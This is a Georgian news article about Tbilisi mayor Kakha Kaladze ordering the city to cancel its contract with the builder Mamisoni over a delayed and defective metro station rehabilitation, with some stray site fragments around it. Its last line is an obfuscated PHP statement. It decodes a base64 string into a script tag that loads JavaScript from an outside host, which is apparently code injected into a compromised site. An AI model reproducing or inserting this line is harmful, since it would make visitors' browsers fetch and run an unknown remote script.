celsiusi
ავერსი საქკაბელი
დღეს, 21 დეკემბერს გამართულ მთავრობის სხდომაზე კახა კალაძემ დაავალა მერიის შესაბამის სტრუქტურებს, რომ სამუშაოების შემსრულებელ კომპანიასთან – „შპს მამისონთან“ კონტრაქტი გაეწყვიტონ და სამომავლო ტენდერებისთვის კომპანია შავ სიაში შეიყვანონ.
კალაძე ამბობს, რომ შესრულებულ სამუშაოებში დაფიქსირებული დეფექტების გარდა, კომპანია არ აწარმოებდა საჭირო დოკუმენტაციას.
„მეტროსადგური გოცირიძის სარეაბილიტაციო სამუშაოები, მართალია ძალიან დიდი დაგვიანებით, მაგრამ დასრულებულია. თუ არ ჩავთვლით, რამდენიმე დეფექტს, რამდენიმე პრობლემას, რომელიც აუცილებლად უნდა გამოსწორდეს. სამუშაოების დაგვიანების გარდა მნიშვნელოვანია ის, რომ კომპანიამ არ აწარმოა საჭირო დოკუმენტაცია, ჯერჯერობით არ ჩატარებულა შესაბამისი ექსპერტიზა. მე რამდენჯერმე ხაზი გავუსვი იმას, რომ მიმდინარეობს ექსპლუატაციაში მიღების პროცედურები, დადგენილია გარკვეული დეფექტები, რომელსაც სჭირდება გამოსწორება.
თუმცა, აღნიშნული კომპანია, ვინც ამდენი ხნის განმავლობაში აწარმოებდა სამუშაოებს, არის ძალიან პრობლემური, უპასუხისმგებლო კომპანიაა, შესაბამისად, ჩვენ არ ვთვლით საჭიროდ, რომ მოხდეს მასთან სამუშაოების გაგრძელება და არც იმაში ვართ დარწმუნებული, რომ ეს კომპანია შეძლებს დეფექტების, გამოსწორებას, ამიტომ, მინდა დავავალო ვიცე-მერს, ასევე სატრანსპორტო კომპანიის ხელმძღვანელ გიორგი შარკოვს, რომ გაწყვიტოთ ხელშეკრულება აღნიშნულ კომპანიასთან. ეს არის ყველანაირად უპასუხისმგებლო კომპანია და არანაირი სურვილი არ გაგვაჩნია თანამშრომლობის“, – თქვა კალაძემ.
კალაძემ ასევე დაავალა მუნიციპალიტეტის შესაბამის სამსახურებს თავადვე გამოესწორებინათ ხარვეზები – „თანხები რაც დაიხარჯება, სასამართლოს გზით მოსთხოვეთ აღნიშნულ კომპანიას.“
ჯერ კიდევ აგვისტოში მერია ამბობდა, რომ ამ კომპანიამ დამატებითი დრო ითხოვა მეტროსადგურის რეაბილიტაციისთვის. მას შემდეგ ითქვა, რომ ძირითადი სამუშაოები დასრულდა და ახლა ექსპლუატაციაში მიღების პროცედურები მიმდინარეობდა.
თავად „მამისონმა“ რეაბილიტაციის პროექტი შპს „კაიზენისგან“ გადმოიბარა. ამ უკანასკნელთან მერიამ ასევე გაწყვიტა ხელშეკრულება.
ეს პირველი შემთხვევა არაა, როდესაც მერია „მამისონთან“ დადებულ ხელშეკრულებას წყვეტს. ჯერ კიდევ ნოემბერში თბილისის სატრანსპორტო კომპანიამ მეტროსადგურ „ვარკეთილში“ რემონტი შეაჩერა, რადგან „სამშენებლო კომპანია მამისონთან“ , რომელსაც მეტროსადგური უნდა გაერემონტებინა, ხელშეკრულება შეწყვიტა. ხელშეკრულების თანხა 12.76 მილიონი ლარი იყო, რომლის 30 პროცენტიც მშენებელმა კომპანიამ უკვე მიიღო.
538
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");